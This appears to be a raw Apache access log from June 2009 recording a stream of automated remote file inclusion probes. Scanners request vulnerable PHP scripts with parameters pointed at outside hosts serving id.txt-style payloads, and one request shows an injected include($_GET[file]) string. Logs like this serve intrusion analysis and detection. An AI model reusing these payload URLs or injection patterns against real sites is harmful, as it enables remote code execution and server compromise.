85.119.154.129 - - [27/Jun/2009:08:12:17 -0500] "GET /?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:08:12:17 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:08:12:18 -0500] "GET /logs/?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
87.229.45.106 - - [27/Jun/2009:08:13:22 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.229.45.106 - - [27/Jun/2009:08:13:22 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.119.154.129 - - [27/Jun/2009:08:17:34 -0500] "GET //cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:08:17:34 -0500] "GET /logs/access_log.1233792000//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:08:17:35 -0500] "GET /logs//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:08:17:36 -0500] "GET /logs/access_log.1236643200//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:34 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:34 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:34 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:35 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:36 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:36 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:37 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:21:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:22:08 -0500] "GET /logs/access_log.1241568000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:22:08 -0500] "GET /logs/access_log.1241568000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:22:10 -0500] "GET /logs/access_log.1241568000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:08:22:46 -0500] "GET /logs/access_log.1233792000//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:08:22:46 -0500] "GET /logs//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:08:22:46 -0500] "GET //cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:08:22:46 -0500] "GET /logs/access_log.1229817600//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.172.22.2 - - [27/Jun/2009:08:23:18 -0500] "GET //errors.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:08:23:18 -0500] "GET /logs//errors.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.17.99.13 - - [27/Jun/2009:08:23:28 -0500] "GET /logs/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:08:23:28 -0500] "GET /errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
66.172.22.2 - - [27/Jun/2009:08:24:29 -0500] "GET //errors.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:08:24:29 -0500] "GET /logs//errors.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
65.55.106.158 - - [27/Jun/2009:08:25:55 -0500] "GET /logs/access_log.1230768000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.202.81.179 - - [27/Jun/2009:08:25:57 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:25:57 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:25:57 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:08:25:59 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:08:25:59 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
82.136.20.14 - - [27/Jun/2009:08:26:54 -0500] "GET /logs/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:08:26:55 -0500] "GET /errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.202.81.179 - - [27/Jun/2009:08:27:08 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:27:08 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:27:08 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
63.163.109.234 - - [27/Jun/2009:08:28:25 -0500] "GET /logs//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
63.163.109.234 - - [27/Jun/2009:08:28:25 -0500] "GET //cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
63.163.109.234 - - [27/Jun/2009:08:28:25 -0500] "GET /logs/access_log.1235779200//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
63.163.109.234 - - [27/Jun/2009:08:28:29 -0500] "GET /logs/access_log.1233792000//cache/errors.php?error=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:23 -0500] "GET /logs/access_log.1241395200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:23 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:29 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:29 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:29 -0500] "GET /logs/access_log.1241395200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:34 -0500] "GET /logs/access_log.1241395200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:34 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:08:29:34 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:30:26 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:30:26 -0500] "GET /logs/access_log.1233705600//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:30:26 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:16 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:21 -0500] "GET /logs/access_log.1233878400//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:21 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:25 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:25 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:25 -0500] "GET /logs/access_log.1233705600//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:31:44 -0500] "GET /logs/access_log.1233878400//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.172.22.2 - - [27/Jun/2009:08:32:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:08:32:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.107.138.34 - - [27/Jun/2009:08:32:05 -0500] "GET /logs/access_log.1233878400//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:32:29 -0500] "GET /logs/access_log.1241395200/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:32:31 -0500] "GET /logs/access_log.1241395200/s_loadenv.inc.php?DOCUMENT_ROOT=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.172.22.2 - - [27/Jun/2009:08:32:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:08:32:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
131.203.76.246 - - [27/Jun/2009:08:32:58 -0500] "GET /logs//purchase.html.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:08:32:58 -0500] "GET /logs/access_log.1240358400//purchase.html.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:08:32:58 -0500] "GET /logs/access_log.1239926400//purchase.html.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:08:33:01 -0500] "GET //purchase.html.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:33:46 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:33:46 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:33:46 -0500] "GET /logs/access_log.1233705600//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:08:33:55 -0500] "GET /logs/access_log.1233878400//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:19 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:19 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:19 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:19 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:31 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:31 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:31 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:08:36:31 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:08:42:08 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:08:42:08 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
131.203.76.246 - - [27/Jun/2009:08:43:35 -0500] "GET /logs/access_log.1241913600//purchase.html.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:08:43:58 -0500] "GET /logs/access_log.1239580800//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 343 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:08:43:58 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 316 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:08:43:58 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 321 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:08:44:03 -0500] "GET /logs/access_log.1236643200//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 343 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:08:44:24 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:08:44:24 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.826"
82.136.20.14 - - [27/Jun/2009:08:47:19 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:08:47:19 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
67.202.81.179 - - [27/Jun/2009:08:47:26 -0500] "GET /logs/access_log.1239494400//include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:47:26 -0500] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:47:26 -0500] "GET //include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:47:27 -0500] "GET /logs/access_log.1239494400//include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:47:27 -0500] "GET //include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:08:47:27 -0500] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:08:48:02 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:08:48:02 -0500] "GET //bbs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:08:48:02 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:08:48:19 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:08:48:19 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
38.103.48.109 - - [27/Jun/2009:08:48:50 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
38.103.48.109 - - [27/Jun/2009:08:48:50 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
125.131.116.12 - - [27/Jun/2009:08:49:49 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
38.117.93.134 - - [27/Jun/2009:08:50:16 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
38.117.93.134 - - [27/Jun/2009:08:50:16 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
62.140.23.192 - - [27/Jun/2009:08:50:38 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:08:50:38 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
211.43.195.120 - - [27/Jun/2009:08:51:09 -0500] "GET /logs/access_log.1238889600///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:51:09 -0500] "GET ///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:51:11 -0500] "GET /logs///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:51:15 -0500] "GET /logs/access_log.1238803200///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:08:52:54 -0500] "GET /?custompluginfile[]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:08:52:55 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:52:55 -0500] "GET /logs/access_log.1238889600///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:52:55 -0500] "GET ///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:08:52:55 -0500] "GET /logs///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:08:52:55 -0500] "GET /logs/?custompluginfile[]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
82.136.20.14 - - [27/Jun/2009:08:52:58 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
